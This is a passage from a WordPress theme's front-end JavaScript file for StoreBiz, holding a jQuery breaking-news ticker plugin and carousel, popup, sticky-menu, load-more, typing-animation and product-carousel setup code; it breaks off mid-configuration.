File: /home/c/c9375562/c9375562.beget.tech/public_html/wp-content/themes/storebiz/assets/js/custom.js
! function(p) {
"use strict";
p.breakingNews = function(e, t) {
var i = {
effect: "scroll",
direction: "ltr",
height: 40,
fontSize: "default",
themeColor: "default",
background: "default",
borderWidth: 1,
radius: 2,
source: "html",
rss2jsonApiKey: "",
play: !0,
delayTimer: 4e3,
scrollSpeed: 2,
stopOnHover: !0,
position: "auto",
zIndex: 99999
},
a = this;
a.settings = {},
a._element = p(e),
a._label = a._element.children(".bn-label"),
a._news = a._element.children(".bn-news"),
a._ul = a._news.children("ul"),
a._li = a._ul.children("li"),
a._controls = a._element.children(".bn-controls"),
a._prev = a._controls.find(".bn-prev").parent(),
a._action = a._controls.find(".bn-action").parent(),
a._next = a._controls.find(".bn-next").parent(),
a._pause = !1, a._controlsIsActive = !0,
a._totalNews = a._ul.children("li").length,
a._activeNews = 0, a._interval = !1,
a._frameId = null;
var o = function() {
if (0 < a._label.length && ("rtl" == a.settings.direction ? a._news.css({
right: a._label.outerWidth()
}) : a._news.css({
left: a._label.outerWidth()
})), 0 < a._controls.length) {
var e = a._controls.outerWidth();
"rtl" == a.settings.direction ? a._news.css({
left: e
}) : a._news.css({
right: e
})
}
if ("scroll" === a.settings.effect) {
var t = 0;
a._li.each(function() {
t += p(this).outerWidth()
}), t += 50, a._ul.css({
width: t
})
}
},
s = function() {
var l = new XMLHttpRequest;
l.onreadystatechange = function() {
if (4 == l.readyState && 200 == l.status) {
var e = JSON.parse(l.responseText),
t = "",
i = "";
switch (a.settings.source.showingField) {
case "title":
i = "title";
break;
case "description":
i = "description";
break;
case "link":
i = "link";
break;
default:
i = "title"
}
var s = "";
void 0 !== a.settings.source.seperator && void 0 !== typeof a.settings.source.seperator && (s = a.settings.source.seperator);
for (var n = 0; n < e.items.length; n++) a.settings.source.linkEnabled ? t += '<li><a target="' + a.settings.source.target + '" href="' + e.items[n].link + '">' + s + e.items[n][i] + "</a></li>" : t += "<li><a>" + s + e.items[n][i] + "</a></li>";
a._ul.empty().append(t), a._li = a._ul.children("li"), a._totalNews = a._ul.children("li").length, o(), "scroll" != a.settings.effect && d(), a._li.find(".bn-seperator").css({
height: a.settings.height - 2 * a.settings.borderWidth
}), f()
}
}, l.open("GET", "https://api.rss2json.com/v1/api.json?rss_url=" + a.settings.source.url + "&count=" + a.settings.source.limit + "&api_key=" + a.settings.source.rss2jsonApiKey, !0), l.send()
},
n = function() {
p.getJSON(a.settings.source.url, function(e) {
var t = "",
i = "";
i = "undefined" === a.settings.source.showingField ? "title" : a.settings.source.showingField;
var s = "";
void 0 !== a.settings.source.seperator && void 0 !== typeof a.settings.source.seperator && (s = a.settings.source.seperator);
for (var n = 0; n < e.length && !(n >= a.settings.source.limit); n++) a.settings.source.linkEnabled ? t += '<li><a target="' + a.settings.source.target + '" href="' + e[n].link + '">' + s + e[n][i] + "</a></li>" : t += "<li><a>" + s + e[n][i] + "</a></li>", "undefined" === e[n][i] && console.log('"' + i + '" does not exist in this json.');
a._ul.empty().append(t), a._li = a._ul.children("li"), a._totalNews = a._ul.children("li").length, o(), "scroll" != a.settings.effect && d(), a._li.find(".bn-seperator").css({
height: a.settings.height - 2 * a.settings.borderWidth
}), f()
})
},
l = function() {
var e = parseFloat(a._ul.css("marginLeft"));
e -= a.settings.scrollSpeed / 2, a._ul.css({
marginLeft: e
}), e <= -a._ul.find("li:first-child").outerWidth() && (a._ul.find("li:first-child").insertAfter(a._ul.find("li:last-child")), a._ul.css({
marginLeft: 0
})), !1 === a._pause && (a._frameId = requestAnimationFrame(l), window.requestAnimationFrame && a._frameId || setTimeout(l, 16))
},
r = function() {
var e = parseFloat(a._ul.css("marginRight"));
e -= a.settings.scrollSpeed / 2, a._ul.css({
marginRight: e
}), e <= -a._ul.find("li:first-child").outerWidth() && (a._ul.find("li:first-child").insertAfter(a._ul.find("li:last-child")), a._ul.css({
marginRight: 0
})), !1 === a._pause && (a._frameId = requestAnimationFrame(r)), window.requestAnimationFrame && a._frameId || setTimeout(r, 16)
},
c = function() {
"rtl" === a.settings.direction ? a._ul.stop().animate({
marginRight: -a._ul.find("li:first-child").outerWidth()
}, 300, function() {
a._ul.find("li:first-child").insertAfter(a._ul.find("li:last-child")), a._ul.css({
marginRight: 0
}), a._controlsIsActive = !0
}) : a._ul.stop().animate({
marginLeft: -a._ul.find("li:first-child").outerWidth()
}, 300, function() {
a._ul.find("li:first-child").insertAfter(a._ul.find("li:last-child")), a._ul.css({
marginLeft: 0
}), a._controlsIsActive = !0
})
},
u = function() {
"rtl" === a.settings.direction ? (0 <= parseInt(a._ul.css("marginRight"), 10) && (a._ul.css({
"margin-right": -a._ul.find("li:last-child").outerWidth()
}), a._ul.find("li:last-child").insertBefore(a._ul.find("li:first-child"))), a._ul.stop().animate({
marginRight: 0
}, 300, function() {
a._controlsIsActive = !0
})) : (0 <= parseInt(a._ul.css("marginLeft"), 10) && (a._ul.css({
"margin-left": -a._ul.find("li:last-child").outerWidth()
}), a._ul.find("li:last-child").insertBefore(a._ul.find("li:first-child"))), a._ul.stop().animate({
marginLeft: 0
}, 300, function() {
a._controlsIsActive = !0
}))
},
d = function() {
switch (a._controlsIsActive = !0, a.settings.effect) {
case "typography":
a._ul.find("li").hide(), a._ul.find("li").eq(a._activeNews).width(30).show(), a._ul.find("li").eq(a._activeNews).animate({
width: "100%",
opacity: 1
}, 1500);
break;
case "fade":
a._ul.find("li").hide(), a._ul.find("li").eq(a._activeNews).fadeIn();
break;
case "slide-down":
a._totalNews <= 1 ? a._ul.find("li").animate({
top: 30,
opacity: 0
}, 300, function() {
p(this).css({
top: -30,
opacity: 0,
display: "block"
}), p(this).animate({
top: 0,
opacity: 1
}, 300)
}) : (a._ul.find("li:visible").animate({
top: 30,
opacity: 0
}, 300, function() {
p(this).hide()
}), a._ul.find("li").eq(a._activeNews).css({
top: -30,
opacity: 0
}).show(), a._ul.find("li").eq(a._activeNews).animate({
top: 0,
opacity: 1
}, 300));
break;
case "slide-up":
a._totalNews <= 1 ? a._ul.find("li").animate({
top: -30,
opacity: 0
}, 300, function() {
p(this).css({
top: 30,
opacity: 0,
display: "block"
}), p(this).animate({
top: 0,
opacity: 1
}, 300)
}) : (a._ul.find("li:visible").animate({
top: -30,
opacity: 0
}, 300, function() {
p(this).hide()
}), a._ul.find("li").eq(a._activeNews).css({
top: 30,
opacity: 0
}).show(), a._ul.find("li").eq(a._activeNews).animate({
top: 0,
opacity: 1
}, 300));
break;
case "slide-left":
a._totalNews <= 1 ? a._ul.find("li").animate({
left: "50%",
opacity: 0
}, 300, function() {
p(this).css({
left: -50,
opacity: 0,
display: "block"
}), p(this).animate({
left: 0,
opacity: 1
}, 300)
}) : (a._ul.find("li:visible").animate({
left: "50%",
opacity: 0
}, 300, function() {
p(this).hide()
}), a._ul.find("li").eq(a._activeNews).css({
left: -50,
opacity: 0
}).show(), a._ul.find("li").eq(a._activeNews).animate({
left: 0,
opacity: 1
}, 300));
break;
case "slide-right":
a._totalNews <= 1 ? a._ul.find("li").animate({
left: "-50%",
opacity: 0
}, 300, function() {
p(this).css({
left: "50%",
opacity: 0,
display: "block"
}), p(this).animate({
left: 0,
opacity: 1
}, 300)
}) : (a._ul.find("li:visible").animate({
left: "-50%",
opacity: 0
}, 300, function() {
p(this).hide()
}), a._ul.find("li").eq(a._activeNews).css({
left: "50%",
opacity: 0
}).show(), a._ul.find("li").eq(a._activeNews).animate({
left: 0,
opacity: 1
}, 300));
break;
default:
a._ul.find("li").hide(), a._ul.find("li").eq(a._activeNews).show()
}
},
f = function() {
if (a._pause = !1, a.settings.play) switch (a.settings.effect) {
case "scroll":
"rtl" === a.settings.direction ? a._ul.width() > a._news.width() ? r() : a._ul.css({
marginRight: 0
}) : a._ul.width() > a._news.width() ? l() : a._ul.css({
marginLeft: 0
});
break;
default:
a.pause(), a._interval = setInterval(function() {
a.next()
}, a.settings.delayTimer)
}
},
_ = function() {
a._element.width() < 480 ? (a._label.hide(), "rtl" == a.settings.direction ? a._news.css({
right: 0
}) : a._news.css({
left: 0
})) : (a._label.show(), "rtl" == a.settings.direction ? a._news.css({
right: a._label.outerWidth()
}) : a._news.css({
left: a._label.outerWidth()
}))
};
a.init = function() {
if (a.settings = p.extend({}, i, t), "fixed-top" === a.settings.position ? a._element.addClass("bn-fixed-top").css({
"z-index": a.settings.zIndex
}) : "fixed-bottom" === a.settings.position && a._element.addClass("bn-fixed-bottom").css({
"z-index": a.settings.zIndex
}), "default" != a.settings.fontSize && a._element.css({
"font-size": a.settings.fontSize
}), "default" != a.settings.themeColor && (a._element.css({
"border-color": a.settings.themeColor,
color: a.settings.themeColor
}), a._label.css({
background: a.settings.themeColor
})), "default" != a.settings.background && a._element.css({
background: a.settings.background
}), a._element.css({
height: a.settings.height,
"line-height": a.settings.height - 2 * a.settings.borderWidth + "px",
"border-radius": a.settings.radius,
"border-width": a.settings.borderWidth
}), a._li.find(".bn-seperator").css({
height: a.settings.height - 2 * a.settings.borderWidth
}), a._element.addClass("bn-effect-" + a.settings.effect + " bn-direction-" + a.settings.direction), o(), "object" == typeof a.settings.source) switch (a.settings.source.type) {
case "rss":
"rss2json" === a.settings.source.usingApi ? (s(), 0 < a.settings.source.refreshTime && setInterval(function() {
a._activeNews = 0, a.pause(), a._ul.empty().append('<li style="display:block; padding-left:10px;"><span class="bn-loader-text">......</span></li>'), setTimeout(function() {
s()
}, 1e3)
}, 1e3 * a.settings.source.refreshTime * 60)) : ((l = new XMLHttpRequest).open("GET", "https://query.yahooapis.com/v1/public/yql?q=" + encodeURIComponent('select * from rss where url="' + a.settings.source.url + '" limit ' + a.settings.source.limit) + "&format=json", !0), l.onreadystatechange = function() {
if (4 == l.readyState)
if (200 == l.status) {
var e = JSON.parse(l.responseText),
t = "",
i = "";
switch (a.settings.source.showingField) {
case "title":
i = "title";
break;
case "description":
i = "description";
break;
case "link":
i = "link";
break;
default:
i = "title"
}
var s = "";
"undefined" != a.settings.source.seperator && void 0 !== a.settings.source.seperator && (s = a.settings.source.seperator);
for (var n = 0; n < e.query.results.item.length; n++) a.settings.source.linkEnabled ? t += '<li><a target="' + a.settings.source.target + '" href="' + e.query.results.item[n].link + '">' + s + e.query.results.item[n][i] + "</a></li>" : t += "<li><a>" + s + e.query.results.item[n][i] + "</a></li>";
a._ul.empty().append(t), a._li = a._ul.children("li"), a._totalNews = a._ul.children("li").length, o(), "scroll" != a.settings.effect && d(), a._li.find(".bn-seperator").css({
height: a.settings.height - 2 * a.settings.borderWidth
}), f()
} else a._ul.empty().append('<li><span class="bn-loader-text">' + a.settings.source.errorMsg + "</span></li>")
}, l.send(null));
break;
case "json":
n(), 0 < a.settings.source.refreshTime && setInterval(function() {
a._activeNews = 0, a.pause(), a._ul.empty().append('<li style="display:block; padding-left:10px;"><span class="bn-loader-text">......</span></li>'), setTimeout(function() {
n()
}, 1e3)
}, 1e3 * a.settings.source.refreshTime * 60);
break;
default:
console.log('Please check your "source" object parameter. Incorrect Value')
} else "html" === a.settings.source ? ("scroll" != a.settings.effect && d(), f()) : console.log('Please check your "source" parameter. Incorrect Value');
var l;
a.settings.play ? a._action.find("span").removeClass("bn-play").addClass("bn-pause") : a._action.find("span").removeClass("bn-pause").addClass("bn-play"), a._element.on("mouseleave", function(e) {
var t = p(document.elementFromPoint(e.clientX, e.clientY)).parents(".bn-breaking-news")[0];
p(this)[0] !== t && (!0 === a.settings.stopOnHover ? !0 === a.settings.play && a.play() : !0 === a.settings.play && !0 === a._pause && a.play())
}), a._element.on("mouseenter", function() {
!0 === a.settings.stopOnHover && a.pause()
}), a._next.on("click", function() {
a._controlsIsActive && (a._controlsIsActive = !1, a.pause(), a.next())
}), a._prev.on("click", function() {
a._controlsIsActive && (a._controlsIsActive = !1, a.pause(), a.prev())
}), a._action.on("click", function() {
a._controlsIsActive && (a._action.find("span").hasClass("bn-pause") ? (a._action.find("span").removeClass("bn-pause").addClass("bn-play"), a.stop()) : (a.settings.play = !0, a._action.find("span").removeClass("bn-play").addClass("bn-pause")))
}), _(), p(window).on("resize", function() {
_(), a.pause(), a.play()
})
}, a.pause = function() {
a._pause = !0, clearInterval(a._interval), cancelAnimationFrame(a._frameId)
}, a.stop = function() {
a._pause = !0, a.settings.play = !1
}, a.play = function() {
f()
}, a.next = function() {
! function() {
switch (a.settings.effect) {
case "scroll":
c();
break;
default:
a._activeNews++, a._activeNews >= a._totalNews && (a._activeNews = 0), d()
}
}()
}, a.prev = function() {
! function() {
switch (a.settings.effect) {
case "scroll":
u();
break;
default:
a._activeNews--, a._activeNews < 0 && (a._activeNews = a._totalNews - 1), d()
}
}()
}, a.init()
}, p.fn.breakingNews = function(t) {
return this.each(function() {
if (null == p(this).data("breakingNews")) {
var e = new p.breakingNews(this, t);
p(this).data("breakingNews", e)
}
})
}
}(jQuery);
(function($) {
'use strict';
$( document ).ready(function() {
// Home Slider
var $owlHome = $('.home-slider');
$owlHome.owlCarousel({
rtl: $("html").attr("dir") == 'rtl' ? true : false,
items: 1,
autoplay: true,
autoplayTimeout: 10000,
margin: 0,
loop: true,
dots: true,
nav: false,
navText: ['<i class="fa fa-angle-left"></i>', '<i class="fa fa-angle-right"></i>'],
singleItem: true,
transitionStyle: "fade",
touchDrag: true,
mouseDrag: true,
responsive: {
0: {
nav: false
},
768: {
nav: true
},
992: {
nav: true
}
}
});
$owlHome.owlCarousel();
$owlHome.on('translate.owl.carousel', function (event) {
var data_anim = $("[data-animation]");
data_anim.each(function() {
var anim_name = $(this).data('animation');
$(this).removeClass('animated ' + anim_name).css('opacity', '0');
});
});
$("[data-delay]").each(function() {
var anim_del = $(this).data('delay');
$(this).css('animation-delay', anim_del);
});
$("[data-duration]").each(function() {
var anim_dur = $(this).data('duration');
$(this).css('animation-duration', anim_dur);
});
$owlHome.on('translated.owl.carousel', function() {
var data_anim = $owlHome.find('.owl-item.active').find("[data-animation]");
data_anim.each(function() {
var anim_name = $(this).data('animation');
$(this).addClass('animated ' + anim_name).css('opacity', '1');
});
});
// Testimonial Slider
var owlTestimonial = $(".testimonials-slider");
owlTestimonial.owlCarousel({
rtl: $("html").attr("dir") == 'rtl' ? true : false,
loop: true,
nav: false,
margin: 2,
items: 1,
center: true,
mouseDrag: true,
touchDrag: true,
autoplay: true,
autoplayTimeout: 12000,
responsive: {
0: {
stagePadding: 0,
dots: false,
items: 1
},
768: {
stagePadding: 0,
dots: true,
items: 2
},
992: {
stagePadding: 0,
dots: true,
items: 3,
}
}
});
// Custom Button
$('.testimonial-nav .owl-next').click(function() {
owlTestimonial.trigger('next.owl.carousel');
});
$('.testimonial-nav .owl-prev').click(function() {
owlTestimonial.trigger('prev.owl.carousel');
});
// Blog Slider
var owlBlog = $(".blog-slider");
owlBlog.owlCarousel({
rtl: $("html").attr("dir") == 'rtl' ? true : false,
loop: true,
nav: false,
margin: 2,
mouseDrag: true,
touchDrag: true,
autoplay: true,
autoplayTimeout: 12000,
responsive: {
0: {
stagePadding: 0,
dots: false,
items: 1
},
768: {
stagePadding: 0,
dots: true,
items: 2
},
992: {
stagePadding: 0,
dots: true,
items: 3,
}
}
});
// Custom Button
$('.blog-nav .owl-next').click(function() {
owlBlog.trigger('next.owl.carousel');
});
$('.blog-nav .owl-prev').click(function() {
owlBlog.trigger('prev.owl.carousel');
});
$(window).on('load', function () {
if ($('.storebiz-popup').length) {
$.magnificPopup.open({
items: [{
src: '#storebiz-popup',
type: 'inline'
}],
fixedContentPos: true,
midClick: true,
closeOnBgClick: false,
removalDelay: 300,
mainClass: 'mfp-fade',
callbacks: {
open: function() {
$('.storebiz-popup .mfp-close').on('click',function(e){
e.preventDefault();
$.magnificPopup.close();
});
}
}
});
localStorage.setItem('storebiz_popup', 'true');
}
});
// ScrollUp
$(window).on('scroll', function () {
if ($(this).scrollTop() > 200) {
$('.scrollingUp').addClass('is-active');
} else {
$('.scrollingUp').removeClass('is-active');
}
});
$('.scrollingUp').on('click', function () {
$("html, body").animate({
scrollTop: 0
}, 600);
return false;
});
// Sticky Header
$(window).on('scroll', function() {
if ($(window).scrollTop() >= 250) {
$('.is-sticky-on').addClass('is-sticky-menu');
}
else {
$('.is-sticky-on').removeClass('is-sticky-menu');
}
});
// Breadcrumb Sticky Menu
$(window).on('scroll', function() {
if ($(window).scrollTop() >= 420) {
$('.breadcrumb-sticky-on').addClass('breadcrumb-sticky-menu');
}
else {
$('.breadcrumb-sticky-on').removeClass('breadcrumb-sticky-menu');
}
});
// Service Section Load Button Filter
$(".service-home .st-load-item").slice(0, 3).show();
$(".service-home .st-load-btn").on('click', function (e) {
e.preventDefault();
$(".service-home .st-load-btn").addClass("loadspinner");
$(".service-home .st-load-btn").animate({
display: "block"
}, 2500,
function () {
// Animation complete.
// $(".load-2:hidden").slice(0, 2).slideDown()
// .each(function() {
// $('#grid').shuffle('appended', $(this));
// });
$(".service-home .st-load-item:hidden").slice(0, 3).slideDown();
if ($(".service-home .st-load-item:hidden").length === 0) {
$(".service-home .st-load-btn").text("No more");
}
$(".service-home .st-load-btn").removeClass("loadspinner");
}
);
});
$(".service-page .st-load-item").slice(0, 6).show();
$(".service-page .st-load-btn").on('click', function (e) {
e.preventDefault();
$(".service-page .st-load-btn").addClass("loadspinner");
$(".service-page .st-load-btn").animate({
display: "block"
}, 2500,
function () {
// Animation complete.
// $(".load-2:hidden").slice(0, 2).slideDown()
// .each(function() {
// $('#grid').shuffle('appended', $(this));
// });
$(".service-page .st-load-item:hidden").slice(0, 3).slideDown();
if ($(".service-page .st-load-item:hidden").length === 0) {
$(".service-page .st-load-btn").text("No more");
}
$(".service-page .st-load-btn").removeClass("loadspinner");
}
);
});
//Projects Section Load Button Filter
$("#projects-section .st-load-item").slice(0, 6).show();
$("#projects-section .st-load-btn").on('click', function (e) {
e.preventDefault();
$("#projects-section .st-load-btn").addClass("loadspinner");
$("#projects-section .st-load-btn").animate({
display: "block"
}, 2500,
function () {
$("#projects-section .st-load-item:hidden").slice(0, 3).slideDown();
if ($("#projects-section .st-load-item:hidden").length === 0) {
$("#projects-section .st-load-btn").text("No more");
}
$("#projects-section .st-load-btn").removeClass("loadspinner");
}
);
});
if( $('.browse-menu ul.main-menu').children().length >= 6 ) {
$(".browse-menu").addClass("active");
$(".browse-menu ul.main-menu").append('<li class="menu-item more-item"><button type="button" class="browse-more"><span>More Category</span> <i class="fa fa-plus"></i></button></li>');
$(".browse-menu > ul.main-menu > li:not(.more-item)").slice(0, 6).show();
$(".browse-more").on('click', function (e) {
//e.preventDefault();
if (!$(".browse-more").hasClass("active")) {
$(".browse-more").addClass("active");
$('.browse-more i').removeClass('fa-plus').addClass("fa-minus");
$(".browse-more").animate({
display: "block"
}, 500,
function () {
$(".browse-menu > ul.main-menu > li:not(.more-item):hidden").addClass('actived').slideDown(200);
if ($(".browse-menu > ul.main-menu > li:not(.more-item):hidden").length === 0) {
$(".browse-more").html('<span>No More</span> <i class="fa fa-minus"></i>');
}
}
);
} else {
$(".browse-more").removeClass("active");
$(".browse-more").animate({
display: "none"
}, 500,
function () {
if ($(".browse-menu > ul.main-menu > li:not(.more-item)").hasClass('actived')) {
$(".browse-menu > ul.main-menu > li:not(.more-item).actived").slice(0, 6).slideUp(200);
$(".browse-more").html('<span>More Category</span> <i class="fa fa-plus"></i>');
}
}
);
}
});
}
$('.browse-cat').hasClass('vertical-is-active') ? browseMenuAccessibility() : $('.browse-btn').focus();
function browseMenuAccessibility() {
var e, t, i, n = document.querySelector(".browse-cat");
let a = document.querySelector(".browse-btn"),
s = n.querySelectorAll('button, [href], input, select, textarea, [tabindex]:not([tabindex="-1"])'),
o = s[s.length - 1];
if (!n) return !1;
for (t = 0, i = (e = n.getElementsByTagName("a")).length; t < i; t++) e[t].addEventListener("focus", c, !0), e[t].addEventListener("blur", c, !0);
function c() {
for (var e = this; - 1 === e.className.indexOf("browse-cat-build");) "li" === e.tagName.toLowerCase() && (-1 !== e.className.indexOf("focus") ? e.className = e.className.replace(" focus", "") : e.className += " focus"), e = e.parentElement
}
document.addEventListener("keydown", function(e) {
("Tab" === e.key || 9 === e.keyCode) && (e.shiftKey ? document.activeElement === a && (o.focus(), e.preventDefault()) : document.activeElement === o && (a.focus(), e.preventDefault()))
})
}
// Animated Typing Text
var typingText = function (el, toRotate, period) {
this.toRotate = toRotate;
this.el = el;
this.loopNum = 0;
this.period = parseInt(period, 10) || 2000;
this.txt = "";
this.tick();
this.isDeleting = false;
};
typingText.prototype.tick = function () {
var i = this.loopNum % this.toRotate.length;
var fullTxt = this.toRotate[i];
if (this.isDeleting) {
this.txt = fullTxt.substring(0, this.txt.length - 1);
} else {
this.txt = fullTxt.substring(0, this.txt.length + 1);
}
this.el.innerHTML = '<span class="wrap">' + this.txt + "</span>";
var that = this;
var delta = 200 - Math.random() * 100;
if (this.isDeleting) {
delta /= 2;
}
if (!this.isDeleting && this.txt === fullTxt) {
delta = this.period;
this.isDeleting = true;
} else if (this.isDeleting && this.txt === "") {
this.isDeleting = false;
this.loopNum++;
delta = 500;
}
setTimeout(function () {
that.tick();
}, delta);
};
window.onload = function () {
var elements = document.getElementsByClassName("typewrite");
for (var i = 0; i < elements.length; i++) {
var toRotate = elements[i].getAttribute("data-type");
var period = elements[i].getAttribute("data-period");
if (toRotate) {
new typingText(elements[i], JSON.parse(toRotate), period);
}
}
// INJECT CSS
var css = document.createElement("style");
css.type = "text/css";
css.innerHTML = ".typewrite > .wrap { border-right: 0.08em solid #111111}";
document.body.appendChild(css);
};
// Perspective Hover Effect
var perspectiveSettings = [
{},
{
movement: {
imgWrapper : {
translation : {x: 10, y: 10, z: 30},
rotation : {x: 0, y: -10, z: 0},
reverseAnimation : {duration : 200, easing : 'easeOutQuad'}
},
lines : {
translation : {x: 10, y: 10, z: [0,70]},
rotation : {x: 0, y: 0, z: -2},
reverseAnimation : {duration : 2000, easing : 'easeOutExpo'}
},
caption : {
rotation : {x: 0, y: 0, z: 2},
reverseAnimation : {duration : 200, easing : 'easeOutQuad'}
},
overlay : {
translation : {x: 10, y: -10, z: 0},
rotation : {x: 0, y: 0, z: 2},
reverseAnimation : {duration : 2000, easing : 'easeOutExpo'}
},
shine : {
translation : {x: 100, y: 100, z: 0},
reverseAnimation : {duration : 200, easing : 'easeOutQuad'}
}
}
},
{
movement: {
imgWrapper : {
rotation : {x: -5, y: 10, z: 0},
reverseAnimation : {duration : 900, easing : 'easeOutCubic'}
},
caption : {
translation : {x: 30, y: 30, z: [0,40]},
rotation : {x: [0,15], y: 0, z: 0},
reverseAnimation : {duration : 1200, easing : 'easeOutExpo'}
},
overlay : {
translation : {x: 10, y: 10, z: [0,20]},
reverseAnimation : {duration : 1000, easing : 'easeOutExpo'}
},
shine : {
translation : {x: 100, y: 100, z: 0},
reverseAnimation : {duration : 900, easing : 'easeOutCubic'}
}
}
},
{
movement: {
imgWrapper : {
rotation : {x: -5, y: 10, z: 0},
reverseAnimation : {duration : 50, easing : 'easeOutQuad'}
},
caption : {
translation : {x: 20, y: 20, z: 0},
reverseAnimation : {duration : 200, easing : 'easeOutQuad'}
},
overlay : {
translation : {x: 5, y: -5, z: 0},
rotation : {x: 0, y: 0, z: 6},
reverseAnimation : {duration : 1000, easing : 'easeOutQuad'}
},
shine : {
translation : {x: 50, y: 50, z: 0},
reverseAnimation : {duration : 50, easing : 'easeOutQuad'}
}
}
},
{
movement: {
imgWrapper : {
translation : {x: 0, y: -8, z: 0},
rotation : {x: 3, y: 3, z: 0},
reverseAnimation : {duration : 1200, easing : 'easeOutExpo'}
},
lines : {
translation : {x: 15, y: 15, z: [0,15]},
reverseAnimation : {duration : 1200, easing : 'easeOutExpo'}
},
overlay : {
translation : {x: 0, y: 8, z: 0},
reverseAnimation : {duration : 600, easing : 'easeOutExpo'}
},
caption : {
translation : {x: 10, y: -15, z: 0},
reverseAnimation : {duration : 900, easing : 'easeOutExpo'}
},
shine : {
translation : {x: 50, y: 50, z: 0},
reverseAnimation : {duration : 1200, easing : 'easeOutExpo'}
}
}
},
{
movement: {
lines : {
translation : {x: -5, y: 5, z: 0},
reverseAnimation : {duration : 1000, easing : 'easeOutExpo'}
},
caption : {
translation : {x: 15, y: 15, z: 0},
rotation : {x: 0, y: 0, z: 3},
reverseAnimation : {duration : 1500, easing : 'easeOutElastic', elasticity : 700}
},
overlay : {
translation : {x: 15, y: -15, z: 0},
reverseAnimation : {duration : 500,easing : 'easeOutExpo'}
},
shine : {
translation : {x: 50, y: 50, z: 0},
reverseAnimation : {duration : 500, easing : 'easeOutExpo'}
}
}
},
{
movement: {
imgWrapper : {
translation : {x: 5, y: 5, z: 0},
reverseAnimation : {duration : 800, easing : 'easeOutQuart'}
},
caption : {
translation : {x: 10, y: 10, z: [0,50]},
reverseAnimation : {duration : 1000, easing : 'easeOutQuart'}
},
shine : {
translation : {x: 50, y: 50, z: 0},
reverseAnimation : {duration : 800, easing : 'easeOutQuart'}
}
}
},
{
movement: {
lines : {
translation : {x: 40, y: 40, z: 0},
reverseAnimation : {duration : 1500, easing : 'easeOutElastic'}
},
caption : {
translation : {x: 20, y: 20, z: 0},
rotation : {x: 0, y: 0, z: -5},
reverseAnimation : {duration : 1000, easing : 'easeOutExpo'}
},
overlay : {
translation : {x: -30, y: -30, z: 0},
rotation : {x: 0, y: 0, z: 3},
reverseAnimation : {duration : 750, easing : 'easeOutExpo'}
},
shine : {
translation : {x: 100, y: 100, z: 0},
reverseAnimation : {duration : 750, easing : 'easeOutExpo'}
}
}
}];
function init() {
var idx = 0;
[].slice.call(document.querySelectorAll('.tilter')).forEach(function(el, pos) {
idx = pos%2 === 0 ? idx+1 : idx;
new TiltFx(el, perspectiveSettings[idx-1]);
});
}
init();
});
// Tab Filter
$(window).on('load', function () {
var postFilter = $('.st-filter-init');
$.each(postFilter,function (index,value) {
var el = $(this);
var parentClass = $(this).parent().attr('class');
var $selector = $('#'+el.attr('id'));
if ($selector.hasClass('pricing-init')) {
$($selector).imagesLoaded(function () {
var festivarMasonry = $($selector).isotope({
itemSelector: '.st-filter-item',
percentPosition: true,
transformsEnabled: false,
filter: '.monthly',
masonry: {
columnWidth: 0,
gutter:0
}
});
$(document).on('click', '.'+parentClass+' .st-tab-filter a', function () {
var filterValue = $(this).attr('data-filter');
festivarMasonry.isotope({
filter: filterValue,
animationOptions: {
duration: 450,
easing: "linear",
queue: false,
}
});
return false;
});
});
} else {
$($selector).imagesLoaded(function () {
var festivarMasonry = $($selector).isotope({
itemSelector: '.st-filter-item',
percentPosition: true,
masonry: {
columnWidth: 0,
gutter:0
}
});
$(document).on('click', '.'+parentClass+' .st-tab-filter a', function () {
var filterValue = $(this).attr('data-filter');
festivarMasonry.isotope({
filter: filterValue,
animationOptions: {
duration: 450,
easing: "linear",
queue: false,
}
});
return false;
});
});
}
});
$(document).on('click', '.st-tab-filter a', function () {
$(this).siblings().removeClass('active');
$(this).addClass('active');
});
// Tab Swipe Indicator
$('.tab-swipe-filter').append('<span class="indicator"></span>');
if ($('.tab-swipe-filter a').hasClass('active')) {
let cLeft = $('.tab-swipe-filter a.active').position().left + 'px',
cWidth = $('.tab-swipe-filter a.active').css('width');
$('.indicator').css({
left: cLeft,
width: cWidth
})
}
$('.tab-swipe-filter a').on('click', function () {
$('.tab-swipe-filter a').removeClass('is-active');
$(this).addClass('is-active');
let cLeft = $('.tab-swipe-filter a.is-active').position().left + 'px',
cWidth = $('.tab-swipe-filter a.is-active').css('width');
$('.indicator').css({
left: cLeft,
width: cWidth
})
});
});
// Recent Product Carousel
var owlRecentProducts = $(".recent-products-carousel .woocommerce .products");
owlRecentProducts.each(function () {
$(this).addClass('owl-carousel owl-theme');
});
owlRecentProducts.owlCarousel({
rtl: $("html").attr("dir") == 'rtl' ? true : false,
loop: true,
nav: false,
dots: false,
margin: 20,
mouseDrag: true,
touchDrag: true,
autoplay: true,
autoplayTimeout: 12000,
stagePadding: 0,
autoHeight: true,
responsive: {
0: {
items: 1
},
768: {
items: 3
},
992: {
items: 4
}
}
});
// Custom Button
$('.recent-product-nav .owl-next').click(function() {
owlRecentProducts.trigger('next.owl.carousel');
});
$('.recent-product-nav .owl-prev').click(function() {
owlRecentProducts.trigger('prev.owl.carousel');
});
$( '.recent-products-carousel .owl-filter-bar' ).on( 'click', '.item', function() {
var $item = $(this);
var filter = $item.data( 'owl-filter' )
owlRecentProducts.owlcarousel2_filter( filter );
});
// Featured Product Carousel
var owlFeaturedProducts = $(".featured-products-carousel .woocommerce .products");
owlFeaturedProducts.each(function () {
$(this).addClass('owl-carousel owl-theme');
});
owlFeaturedProducts.owlCarousel({
rtl: $("html").attr("dir") == 'rtl' ? true : false,
loop: true,
nav: false,
dots: false,
margin: 20,
mouseDrag: true,
touchDrag: true,
autoplay: true,
autoplayTimeout: 12000,
stagePadding: 0,
autoHeight: true,
responsive: {
0: {
items: 1
},
768: {
items: 3
},
992: {
items: 4
}
}
});
// Custom Button
$('.featured-product-nav .owl-next').click(function() {
owlFeaturedProducts.trigger('next.owl.carousel');
});
$('.featured-product-nav .owl-prev').click(function() {
owlFeaturedProducts.trigger('prev.owl.carousel');
});
$( '.featured-products-carousel .owl-filter-bar' ).on( 'click', '.item', function() {
var $item = $(this);
var filter = $item.data( 'owl-filter' )
owlFeaturedProducts.owlcarousel2_filter( filter );
});
// Best Product Carousel
var owlBestProducts = $(".best-products-carousel .woocommerce .products");
owlBestProducts.each(function () {
$(this).addClass('owl-carousel owl-theme');
});
owlBestProducts.owlCarousel({
rtl: $("html").attr("dir") == 'rtl' ? true : false,
loop: true,
nav: false,
dots: false,
margin: 20,
mouseDrag: true,
touchDrag: true,
autoplay: true,
autoplayTimeout: 12000,
stagePadding: 0,
